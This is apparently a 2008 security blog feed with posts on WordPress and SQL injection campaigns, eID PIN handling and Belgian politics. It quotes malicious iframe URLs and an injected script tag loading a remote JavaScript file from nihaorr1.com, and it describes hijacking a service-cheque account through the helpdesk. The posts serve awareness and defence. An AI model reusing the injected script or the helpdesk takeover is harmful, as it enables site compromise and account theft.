• Thousands need to update Wordpress (again)

    You need to have updated wordpress again by now. An important security update was released last week.

    otherwise you could get infected by injected iframes like those

    http://www.wp-stats-php.info

    http://61.155.8.157/iframe/wp-stats.php

    http://www.rxpharmacyonline.org/1/js_go_f1.php

    If I google   "powered by wordpress" site:be than I have about 251.000 pages but if I add 2.5.1 (the last version) than I only have 47 pages but it seems the version isn't always indicated on the site (that would make it too easy)

    but as said before, this doesn't mean the injectionbots won't come by and try leaving their mark on your site, like dogs on every corner they can find....  

     

  • Confusing indications of what is adware, malware and spyware in share and freeware

    Take this as an example

    Acez jukebox from http://www.acez.com or http:// freefunfiles.com

    According to badware.org this is adware (red)  

    According to spywaresignatures and many others this has adware, but moderate 

    But according to softalizer this is free of malware and adware as says suggestsoft.com

    So what is it ? 

    Some antivirus companies say it is greyware, it is not really adware or a virus but you shouldn't allow it on your network. That is clear for your network, but for the simple home-user looking for something free, this seems quite confusing.

    I didn't find it on download.com but on many others. Maybe those others should start looking at why I trust download.com more than those that just upload any crap they receive 

  • How do you recognize links to hacked Wordpress blogs

    There was an automated worm that used a vulnerability in Wordpress to install a folder "wp-content/1/ " in which it forwarded several pages to other domains. It is a spambot in fact. So when you see links popping up with that in it, you can be sure that it was hacked.

    some spammed forums

    www.pzwvl.be

    www.afkikker.be

    www.quicklaw.be

    douwen.sin.khk.be

    some of the sites that have such vulnerability are indicated by Google as dangereous

    Fast cash advance payday loan

    This site may harm your computer.
    Fast Cash Advance Payday Loan. Fast cash advance payday loan Imagine that you qualify for. This should be a dangerous situation if you prefer, you may have. ...
    voice.satama.com/wp-content/1/fast-cash-advance-payday-loan.html
  • Huge mistake when using your eID

    I came up today on the blog of a developer who was very proud of having integrated the eID card with OpenID, a kind of Single Sign-On for blogs (ref. http://blog.rootshell.be/2008/04/28/openid-and-belgian-eid/).

    This guy is a technical person, and he did a huge mistake that every citizen could do. When using the service, he was asked to authenticate on the site, so to enter his PIN code in a dialog box coming from the Web site (we see a picture on the blog). And he did it ! And he found this normal !

    What was the result: the Web site received the PIN code.

    This is a huge mistake: never type your PIN in another dialog box than the one coming from the middleware. Even if a local application asks for it, don't type it. There is absolutely no need to. The PIN is only needed to "unlock" a feature on the card. No application ever needs the PIN.

    In case a software or Web site developer tells you that it is normal, tell him that the application is badly designed and insecure. I'm giving eID training to developers for several years, and on each session I have at least one developer (and sometimes several ones) telling me that this was the way they developed an application "because they didn't know ".

     Please explain that to all of your friends, colleagues, etc.

     

    Marc Stern  --  marc.stern [at] approach.be

  • Verviers again called a terrorist center or not ?

    We can ask ourselves what it is with Verviers that after the socalled PKK training camps (which were not there) it is now called the center of Hamas in Europe according to a new report

    We have treated this report already before (you read some things first here... and some were already published by theinquirer (now at our furl.net archive a year before))  There are other things in that report that are much more important and that show that Belgium is being very active in trying to limit the influence of radicals in the organised muslimcommunities in Belgium. (last page)

    This report shows very clearly a problem with the definition of terrorism or sympathiser without taking into account all the consequences of such a labelling.  We should be harsh and unrelentless against terrorists and their direct immediate supporters and networks, but we shouldn't label every opposition and critique and protest as terrorist what some of these think tanks and organisational charts are doing. (example the charts in this report)

    And this guy participated in an event organised by the American embassy several years ago which had the goal of bringing moderate muslim leaders and the western political leaders and professors together in an open dialogue, trying to build a bridge.  So would he be invited if he was a mole or a spy ? Wouldn't he be vetted thoroughly inside out upside down before they had send him an invitation ? Would he still be invited if they would have found any trace of links to terrorist groups or quotes that would show any sympathy ? 

    Of course he could have changed course, as people sometimes do. And while Hamas is a terrorist organisation for some, it ain't for others and such organisations have a multitude of organisations so people can participate in their movement (charity, solidarity, political pressure) without being in contact with any of the more military activities or sympathies.  It is sure that they are part of the same movement and that they are at the top organised or controlled by the same people, but labelling anyone a terrorist that has anything to do with any of those organisations (submarines) is sometimes a bit farstreched. Except if you want to have 2 million people in your terrorist watchlist. 

    But as the organisation has the same name as an important Mosque and as a Hamas brigade of so-called martyrs that are responsable for suicide attacks and the same name as the Hamas TV channels that uses Disney figures to teach children that the most important thing in life is to blow themselves up, it is understandable that doubts linger.  

    Al-Aqsa Foundation, Belgium : A Hamas-affiliated foundation outlawed by Israel in 1997 and classified as a terrorist organization in 1998, and designated by American Executive Order 13224 and in Switzerland and in the UK and so on. THe guy should know this also. 

  • decade old votingcode used for next years elections

    So they go at it once again. The same code that has now been used during more or less a decade will be used again in the next election next year. There was no alternative as the report from the universities is embroiled in controversy (as their choices include things like RFID and very few controls) and the parliaments still have to organize its debate (and wants to hear some experts and other opinions than the traditional 'no problemo'). The question is when because the same parliaments are already pre-occupied with a lot of typical Belgian institutional questions that dominate the politicians and there advisors (while the populations begins to feel the inflation of the prices of basic food and services)

    If there are code-gurus or fuzzers out there. Here is the code. They say it has been vetted and controlled already several times by so-called auditors by some of the big 4. If you can find a mistake, than you should take someones place over there (joke). http://www.ibz.rrn.fgov.be/index.php?id=66&L=1

    If you don't want to send your code remarks directly, we have backchannels if needed.

  • some interesting documents

    Hearings in the US senate about the future of the internet with some high level speakers (Lawrence Lessig)

    US National Spectrum Policy for the future (gps, bands, ....)  

    UK document about Next Generation Broadband 

    US science and techology policy overview 

     

    Workshop by Rand about assumption based analysis of the US antiterrorism strategy and alternatives (80 pages)

    Battlewise, the networked warfare  

    Precision in the war on terror and inciting muslims (US strategic military studies) 

    The alqaida virtual media network (march 2008 good report) 

    Challenge of nuclear armed regional adversories (RAND) 

    How the decision came about to invade Iraq

    Foreign military assets in natural disaster response 

    Paper about hate speech 

    US datamining and homeland security

    US congressional oversight of intelligence

    US interagency reform debat about national security 

     

    US department of Justice guide for Electronic Evidence First Responders - new version april 2008 (74 pages) a must

    US department of Justice guide for treatment of victims for First responders 

    Final Report of the US national critical infrastructure advisory board about the chemical, biological and radiological events and the national critical infrastructure workforce (recommendations) 88 pages

     

    Climate change as a security risk (German Advisory Board on change) 

    Artic climate impact study WWF

     

    Report from US General Accounting Office about the challenges of Emailmanagement in 4 administrations  

    European roundtable of experts about Assessing the Cyberwarfare threat 

    Information Security and Data Breach Notification Safeguards (PDF; 156 KB) Source: Congressional Research Service

    US congressional hearings about new rights for credit card holders 

    Why the proposed IFILE system by the US (tax) IRS won't work (people can prepare and file their tax returns electronically) 

    the complexity of implementing RealID in the US 

     

    IMF report about Housing markets and business cycles

    The report to the international decision makers from the Financial Stability Forum 

  • Nearly 1 million people on the US terrorist watch list

    Such lists make only sense if only the most pertinent persons are included. You will never arrive at stopping all the sleepers and unknown militants without at the same time denying access, travel or privacy to hundreds of thousands of other persons that have done nothing wrong than just to correspond to a mix of characteristics that will trigger a formulae.

    If you want to read more about the list (official information) You can't know if you are on the list and it is not clear how you can be removed from the list.

     You can follow here the number of persons added to the list - presumely.
  • Jerome Kerviel, the biggest fraudulent speculator alltimes has an IT job

    He has the job of IT consultant. This job was promised by a friend of his lawyer so he could leave his 'VIP single cell' after only a few days. He has very strict bail conditions, but even.

    Would you trust someone like that working with your ICT infrastructure or data ?

  • New updates from selected freeware

     

       Free Easy CD DVD Burner 3.8


    Get new version now  
    What's new in this version: Version 3.8 is a bug fixing release.
    updated: 4/21/2008
    new version: 3.8
    filed under: CD & DVD Burners
    PScanner++ 1.7.5.2  

       PScanner++ 1.7.5.2


    Get new version now  
    What's new in this version: Version 1.7.5.2 error fixed and improvements.
    updated: 4/17/2008
    new version: 1.7.5.2
    filed under: Spyware Removers
    TekRadius 2.3  

       TekRadius 2.3


    Get new version now  
    What's new in this version: Version 2.3 comes with a console utility for adding, deleting and modifying users.
    updated: 4/17/2008
    new version: 2.3
    filed under: Internet
    IncrediMail Xe 5.7 build 3524  

       IncrediMail Xe 5.7 build 3524


    Get new version now  
    What's new in this version: Version 5.7 build 3524 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/18/2008
    new version: 5.7 build 3524
    filed under: Clients
    Allena 3.2.4  

       Allena 3.2.4


    Get new version now  
    What's new in this version: Version 3.2.4 fixes a ribbon bug and a menu form repaint problem.
    updated: 4/23/2008
    new version: 3.2.4
    filed under: Applications
    Fresh Download 8  

       Fresh Download 8


    Get new version now  
    What's new in this version: Version 8 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 8
    filed under: Download Managers
    Book Search Pro 2  

       Book Search Pro 2


    Get new version now  
    What's new in this version: Version 2 has new interface and bug fixed.
    updated: 4/20/2008
    new version: 2
    filed under: Search Tools
    LanTopolog 1.02  

       LanTopolog 1.02


    Get new version now  
    What's new in this version: Version 1.02 includes quality of network discovery results.
    updated: 4/20/2008
    new version: 1.02
    filed under: Network
    AV Video Morpher 3.0.13  

       AV Video Morpher 3.0.13


    Get new version now  
    What's new in this version: Version 3.0.13 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/17/2008
    new version: 3.0.13
    filed under: CD & DVD Burners
    Ping Test Easy 3.39  

       Ping Test Easy 3.39


    Get new version now  
    What's new in this version: Version 3.39 enhances the IP scan speed.
    updated: 4/21/2008
    new version: 3.39
    filed under: Network
    MSKeyViewer Plus 2  

       MSKeyViewer Plus 2


    Get new version now  
    What's new in this version: Version 2 added command-line options to access a remote registry and export software information found to a .txt or .csv file, fixed detections for COMODO Firewall, Flash Player, and Spybot S&D.
    updated: 4/23/2008
    new version: 2
    filed under: System Utilities
    Miro 1.2.3  

       Miro 1.2.3


    Get new version now  
    What's new in this version: Version 1.2.3 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/23/2008
    new version: 1.2.3
    filed under: Video Players
    PowerFolder 3.0.1  

       PowerFolder 3.0.1


    Get new version now  
    What's new in this version: Version 3.0.1 improves connection stability and contains several other bug fixes
    updated: 4/23/2008
    new version: 3.0.1
    filed under: Remote Access
    iTunesControl 0.41  

       iTunesControl 0.41


    Get new version now  
    What's new in this version: Version 0.41 fix for a bug that prevented certain hotkey combinations from being saved.
    updated: 4/21/2008
    new version: 0.41
    filed under: Audio Plugins & Utilities
    SysAdmin 2.0 build 3017  

       SysAdmin 2.0 build 3017


    Get new version now  
    What's new in this version: Version 2.0 build 3017 includes list of computers it is added IP the address, check of availability of the computer is replaced with check with the help command PING, and possibility of addition OU in containers.
    updated: 4/17/2008
    new version: 2.0 build 3017
    filed under: Management Tools
    Ashampoo ClipFinder 1.39  

       Ashampoo ClipFinder 1.39


    Get new version now  
    What's new in this version: Version 1.39 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 1.39
    filed under: Video Players
    Artisan DVD/DivX Player 3.45  

       Artisan DVD/DivX Player 3.45


    Get new version now  
    What's new in this version: Version 3.45 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/16/2008
    new version: 3.45
    filed under: Digital Media Players
    BayGenie eBay Auction Sniper Free 3.1.3  

       BayGenie eBay Auction Sniper Free 3.1.3


    Get new version now  
    What's new in this version: Version 3.1.3 has set the default time server to use eBay server.
    updated: 4/21/2008
    new version: 3.1.3
    filed under: Auction Tools
    Acala DVD 3GP Ripper 2.9.8  

       Acala DVD 3GP Ripper 2.9.8


    Get new version now  
    What's new in this version: Version 2.9.8 is a bug fixing release.
    updated: 4/23/2008
    new version: 2.9.8
    filed under: DVD Software
    SmartFTP Client (32-bit) 3.0.1013.8  

       SmartFTP Client (32-bit) 3.0.1013.8


    Get new version now  
    What's new in this version: Version 3.0.1013.8 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/21/2008
    new version: 3.0.1013.8
    filed under: FTP Software
    Ad-Aware SE Definition File SE1R239 (04/16/2008)  

       Ad-Aware SE Definition File SE1R239 (04/16/2008)


    Get new version now  
    What's new in this version: The latest release adds new definitions.
    updated: 4/21/2008
    new version: SE1R239 (04/16/2008)
    filed under: Spyware Removers
    Advanced WindowsCare Personal 2.7.2  

       Advanced WindowsCare Personal 2.7.2


    Get new version now  
    What's new in this version: Version 2.7.2 is a bug fixing release.
    updated: 4/20/2008
    new version: 2.7.2
    filed under: Diagnostic Software
    Free Hide Folder 2 build 20080408  

       Free Hide Folder 2 build 20080408


    Get new version now  
    What's new in this version: Version 2 build 20080408 includes unspecified updates.
    updated: 4/22/2008
    new version: 2 build 20080408
    filed under: Encryption Software
    Handy Backup Standard 6.0.8  

       Handy Backup Standard 6.0.8


    Get new version now  
    What's new in this version: Version 6.0.8 has been certified with the "Works with Windows Vista" logo, with 'Run as Windows service' feature, and numerous updates and bug fixes.
    updated: 4/21/2008
    new version: 6.0.8
    filed under: Backup Software
    CyeWeb One Channel 2.1.2  

       CyeWeb One Channel 2.1.2


    Get new version now  
    What's new in this version: Version 2.1.2 adds wildcard searching.
    updated: 4/20/2008
    new version: 2.1.2
    filed under: Webcam & Video
    Adblock Plus 0.7.5.4  

       Adblock Plus 0.7.5.4


    Get new version now  
    What's new in this version: Version 0.7.5.4 locales added Hebrew and Malay; improved Firefox 3 compatibility; changed default keyboard shortcuts to Ctrl+Shift+E (preferences) and Ctrl+Shift+V (blockable items); and removed Check banner links option.
    updated: 4/23/2008
    new version: 0.7.5.4
    filed under: Firefox Extensions
    Advanced DVD Player 2.33  

       Advanced DVD Player 2.33


    Get new version now  
    What's new in this version: Version 2.33 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/23/2008
    new version: 2.33
    filed under: Digital Media Players
    Apex Video Converter Free 6.73  

       Apex Video Converter Free 6.73


    Get new version now  
    What's new in this version: Version 6.73 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/16/2008
    new version: 6.73
    filed under: Video Converters
    Merge MP3 0.1f  

       Merge MP3 0.1f


    Get new version now  
    What's new in this version: Version 0.1f includes unspecified updates.
    updated: 4/16/2008
    new version: 0.1f
    filed under: Audio Plugins & Utilities
    Clean My Registry 4.5  

       Clean My Registry 4.5


    Get new version now  
    What's new in this version: Version 4.5 new localizations.
    updated: 4/17/2008
    new version: 4.5
    filed under: System Utilities
    Acala 3GP Movies Free 2.9.8  

       Acala 3GP Movies Free 2.9.8


    Get new version now  
    What's new in this version: Version 2.9.8 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 2.9.8
    filed under: Video Converters
    IE PassView 1.08  

       IE PassView 1.08


    Get new version now  
    What's new in this version: Version 1.08 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/17/2008
    new version: 1.08
    filed under: Encryption Software
    WOT for Firefox 20080421  

       WOT for Firefox 20080421


    Get new version now  
    What's new in this version: Version 20084021 features an improved user interface and website reputation scorecard.
    updated: 4/23/2008
    new version: 20080421
    filed under: Firefox Extensions
    SpeedFan 4.34  

       SpeedFan 4.34


    Get new version now  
    What's new in this version: Version 4.34 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 4.34
    filed under: System Utilities
    XnView 1.93.6 beta 2  

       XnView 1.93.6 beta 2


    Get new version now  
    What's new in this version: Version 1.93.6 beta 2 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 1.93.6 beta 2
    filed under: Image Editing
    Mozilla Firefox 2.0.0.14  

       Mozilla Firefox 2.0.0.14


    Get new version now  
    What's new in this version: Mozilla Firefox 2.0.0.14 fixes a crash in JavaScript garbage collector.
    updated: 4/17/2008
    new version: 2.0.0.14
    filed under: Web Browsers
    Online TV Player 4.0.20  

       Online TV Player 4.0.20


    Get new version now  
    What's new in this version: Version 4.0.20 updates channel database.
    updated: 4/17/2008
    new version: 4.0.20
    filed under: Video Players
    AVG Anti-Virus Free Edition 8.0.1  

       AVG Anti-Virus Free Edition 8.0.1


    Get new version now  
    What's new in this version: Version 8.0.1 adds integrated spyware protection and a new LinkScanner feature that gives users safety rankings for their Google, Yahoo, and MSN searches.
    updated: 4/23/2008
    new version: 8.0.1
    filed under: Antivirus Software

  • International organisations like UN and Unctad infected / injected

    International organisations and sites all over the world are being infected - injected with a new SQL attack that seems spreading itself better than sex pictures from a celebrity.

    The injection to look for is  .<scriptsrc=http://www.nihaorr1.com/1.js></script ...-

    one can find it on the following international websites

    events.un.org/Edetail.asp?EventID=1307

    www.pocketpcmag.com/awards/category_2005.asp?catid=11

    www.cubajet.com/airports/jose_marti_international_airport.asp

     old.aeroflot.ru/eng/info.asp?ob_no=2963&act=deref&date=2008-04-22

    www.grooveradio.com/article.asp?ArticleID=744

    ucpressjournals.com/journalBuy.asp?j=ncl

    www.funjet.com/

    www.harcourtbooks.com/booksearch/search_results.asp?

    www.btcctb.org/showpage.asp?iPageID=2212&sLangCode=FR

    www.unctad.org/templates/Meeting.asp?intItemID=4148&m=12762

    forums.activefan.com/thread.asp?c=74&y=1&p=6&t=118&s=BS

    exedweb.cc.uic.edu/exed/exedpublic/programs/DisplayProgram.asp?

     

    For the rest Google this " src http www nihaorr1 com 1 js " 

     

  • how well is your door locked

    It took a professional locksmith a piece of plastic and 5 minutes to open a door with three locks. The locks were not those special ones for which you need a card if you lose it, but they still were expensive locks.

    That piece of plastic can only be sold to and used by official locksmiths, but even than it is impressive to see how fast a door can be opened.

    This I have learned before. After a break-in in an appartement the locksmith told me that thiefs look at a door and they count the number of minutes they would need to open it. If it took more than 3 to 5 minutes and there were other doors that would take less, they would leave your door/appartement alone.

    Cybersecurity is no different. Make it very difficult for the script kiddies and automated scanning tools and keep with special tools an eye open for the professional who can attack one port or vulnerability at a time, sometimes during weeks. If you don't keep and interrelate/datamine your logs you won't find these targeted professional attacks and you are without a clue.

  • Sodexho - dienstencheques

    Combining a full-time job as security consultant with being a SANS instructor AND having a non-imaginairy girlfriend :-) doesn't leave much time for cleaning the appartement. So, a few weeks ago I decided to  get myself a cleaning lady. I already had an account on AccorServices (the former provider of "dienstencheques") from the year before, so I didn't have to enroll myself again with Sodexho (the current provider of "dienstencheques").

     Getting up this morning, half a sleep, trying to view my account on Sodexho, I suddenly realised that I have forgotten my username and password.  As I am security aware, all my account information is in my head, so I am pretty screwed right now. There is an option to recover your password through email ...but I am not really sure if my username is correct. The only thing left is to call the friendly lady at the helpdesk:

    Me: Goodmorning, this is Mr. ABC speaking from XY

    Helpdesk: Goodmorning sir, Alicia (fake name) speaking. How can I help you?

    Me: Well, I have my username and password here, but I am unable to login. How can I solve this?

    Helpdesk: What is your personal account number?

    Me: XXX-XXXX-XXX (censored for obvious reasons, especially if you read the rest of this conversation)

    Helpdesk: Thank you. Are you Mr. ABC?

    Me: yups, that's me!

    Helpdesk: Ok, I will give you your login credentials. Do you have something to write it down?

    Me: Sure

    Helpdesk: Your login is XXXX and password is XXXX

    Me: Let my try that .... (silence) .... ok! great, it's working! Thanks!

    Helpdesk: No problem sir! Goodbye

    Mr: Thank you and goodbye 

    Now, the problem here is that whoever knows the personal account number, could potentially receive the login credentials for a personal account. Now guess what ... which number does a service provider need to credit your "dienstencheques"? YES! The personal account number!

    Basically, this means that anyone who is providing services for you, can confirm his own services if he is able to steal your login details as I did here above. What a service! Now I don't even have to confirm my payments anymore!

    And that's not all ... you can also ask for a "reimbursement" of your cheques if you decide you don't need them anymore. So anyone who has your personal account number, can login, use the "change preferences" to change the bank account number, and then ask for a reimbursement of your cheques.

    Oh boy ... did I use an l33T 0day exploit for this? Or a vulnerability that was already know since .... Columbus discovered the Americas? :p

    </free consultancy, targetted for Sodexho>

    Before doing sensitive transactions for an account, verify the identity of the caller. This can be done by using a "shared secret":

    1. At registration, let each user provide a "shared secret". Note that the personal account number of Sodexho is NOT a shared secret, because this is known also by the service providers. "Shared" means something known only by Sodexho and your client. Not shared over the whole world:p

    2. Ask some personal identificaton details randomly (not 100% secure, but better than nothing): address, passport number, SIS-card number, birth date, bank account number ..

    That's what is know as "identification and authentication". Next, you can reset the password, or sent a password reset link to the email address you have on file. If they claim they don't have access to the email address, reset the password and always sent a confirmation email to the account on file.

    Also, some DO NOT's:

    - provide personal information (name, address, ...) BEFORE you have identified and authenticated your called. Things like "Are you Mr. ABX" before authentication are BAD :p

    - let someone change any preferences in the account (such as the bank account number) without confirming through an email address on file, or asking again for the password.

    - let someone reimburse without confirming through email 

    </free consultancy, targetted for Sodexho>

     Well, that's about it again for now. Back to real-life :-).

    Yours Truly,

     

    PS: Anyone attended DC16, msg me

  • Tibet, thanx to the web, information travels

    http://www.wikileaks.org/wiki/Wikileaks_releases_over_150_censored_videos_and_photos_of_the_Tibet_uprising

    wikileaks the site that lawyers tried to bring down has published hundreds of  pictures and videos about the recent and ongoing uprising

  • Geo Ip location from right to wrong

    Did a test with some

    http://www.geoiptool.com/  right, just a country map

    http://www.geoip.co.uk/    right, but just a country map 

    http://www.hostip.info/index.html  right, with a city map and right again

    http://www.ip2location.com/?s=google  country right, network right, city wrong

    http://www.geobytes.com/IpLocator.htm?GetLocation the same city wrong 

    http://www.maxmind.com/app/locate_ip  right no map

    and something interesting   http://www.cucy.net/map/georoute.html traceroute

    maybe you will need a proxy to anonymize

  • Search engines will have to erase european searchlogs

    http://ec.europa.eu/justice_home/fsj/privacy/docs/wpdocs/2008/wp148_en.pdf

    The privacycommission wants all search engines to erase all the information about the searches by Europeans or from Europe after 6 months. This would be the case for any search engine, whatever its location.

    But as it is already complicated like this, they won't try to impose it, but hope there will be general agreements between the european privacycommissions and the biggest searchengines in the hope the others will follow.  

  • Belgian EID and the Microsoft question

    Itprofessional publishes today a 2 page article about the bubble that the Belgian EID is becoming. Under the last government Minister Van Velthoven made it his petproject and every so many weeks there were new announcements and project and it couldn't become less than the biggest ID project on earth. Even Bill Gates came along received a bogus card (forgery) and told everybody how interested he was in this project. Today, according to the article most of the Microsoft EID veterans in Belgium have gone, Redmond has lost interest and the new Belgian Microsoft executives have expressed criticism (and repeat it in this article) that the Belgian EID is not fully compatible with European norms for EID.

    Bruno Segers (ex Microsoft) tries to save the face a bit for FEDICT the responsable project managers for the roll-out and development of EID, but the criticism from the developers of EID compatible products is harsh and without excuse. THe documentation is not helpful, if you know how to find and interpret that information. And even if there are hundreds of applications that could work with EID, than it is clear that there is no communication anymore, nor for the developers, nor for the public that is web2.0, advertised and usable.

    As Agoria (the organisation of the hightech industry in Belgium) says it is time for something new. They say 'communication' (which costs a lot of money and just doesn't solve anything because already too much money has been spent on such campaigns) but maybe it is more coordination, more involvement and more integration that is needed between the different stakeholders.

    And maybe people don't want their EID to be a paymentcard. Maybe people don't want to use their EID for a lot of other things. Maybe people just want their EID to be just that, an EID.  

    and maybe there are other reasons for this season of discontent. 

  • email is just like a letter on the post

    The problem with being a computer'expert' is that people always have a lot of questions when you 'out' yourself.

    But sometimes it is also good to know afterwards that you have accomplished something.  So 2 years ago I got the question by a self employed man what to do with the avalanche of email he needed to treat every day.

    'Just treat it like your normal post.' I answered

    My normal post ?

    Print it - file it - read it thoroughly - think about it - write a first answer - keep it - rethink about it - and when you are absolutely sure than send it

    Every time this consultant is in my city visiting his clients, he thinks about it because it was the best business advice he has ever got. It got him out of trouble.

    The only trouble is that his correspondents don't think the same way. So they are asking for immediate answers. But email is not instant messenging when you are doing business - it is like the post (but by other means) and can have the same (legal) consequences. Just think about it.

    The same counts for personal use of email. If you are not sure that you should respond to a message in email or instant messenging, just don't. Because on the internet - nothing will stay strictly personal for ever. 

    And what does that have to do with security ? Well, if you don't open  your email in a race against the flood you won't open zero days viruses and your antivirus will have more chances to kill that malware code.

    I sometimes call it the danger of the 'instant generation'. Instant sending, instant opening, instant replying, instant interacting - clicking idiots. The day there are powerful SMS viruses this will be the biggest problem. We will have to change these reflexes instantly. 

  • Belgium is a safe haven for the Muslim Brotherhood ?

    This is what a report from an American antiterrorism thinktank says.

    "Since its origins in early student organizations,
    the Belgian Brotherhood network has grown to include Hamas support
    infrastructure and local Islamic groups that in turn are part of the
    Federation of Islamic Organizations in Europe (FIOE), the global Muslim
    Brotherhood umbrella group in Europe. Belgium also serves as the FIOE
    national office. One individual, Bassem Hatahet, appears to be the most
    important figure in the Belgian Muslim Brotherhood.]"

    The record of the Brotherhood operations in Brussels is more mixed. Beyond
    sponsoring a youth conference under the auspices of the Council of Europe, the Ligue Islamique Interculturelle De Belgique does not appear to have succeeded in gaining recognition from any governmental organizations and the Belgian government does appear to have succeeded in keeping the Brotherhood out of the government-sponsored Muslim council by screening the members for extremist backgrounds.160 This is in sharp contrast to
    France, for example, where the government sponsored elections resulted in a dominant role for the Muslim Brotherhood organization there. Although, as this report has documented, the Belgian Brotherhood has recently created a series of new national organizations, it is not clear that any of them has yet been particularly active or successful. Far more successful have been the Belgian-based components of the Federation of Islamic Organizations in Europe (FIOE), particularly the Forum of European Muslim Youth and Student Organizations (FEMYSO), which have managed to achieve official status at the UN, as well as with the Council of Europe and the European Commission. In addition, the location of the FIOE national office in Brussels has resulted in elevating the status of the Belgian branch that recently reported becoming “very active.” Leading the FIOE office in Brussels is Bassem Hatahet, whose name appears on virtually all of the paperwork associated with the Muslim Brotherhood organizations in Belgian. This would appear to confirm Mr. Hatahet’s role as the most important figure in the Belgian Brotherhood as reported by the Belgian security services.

     It is not clear why Al-Aqsa Belgium and CECIV/Essalem were not
    included as part of the Belgian Muslim Brotherhood. It is also not clear why the Belgian government never acted to shutdown Al-Aqsa Belgium as both Germany and the Netherlands did. While sources in the Belgian security service say this was due to the lack of a Belgian anti-terror law, it should also be noted that in 2006, Belgium, along with France and Ireland, argued against declaring the political wing of Hamas a terrorist group, a position that
    might shed light on the thinking behind the decision.

  • Mass attack against 10.000 plus sites is a still ongoing sql attack thanks to Google

    According to analysis coordinated by the Internet Storm Center the mass attack against 10.000 sites some weeks ago was a pure sql injection attack on an industrial scale. There are some other points of interest in the story

    * they used a special tool for it that goes through the process in an adapted way

    * Google is used to find vulnerable machines so you ask yourself how long searchengines want to stay 'partners in crime' by giving information that shouldn't be leaked.

    * the attacks are still going on

    http://isc.sans.org/diary.html?storyid=4294&rss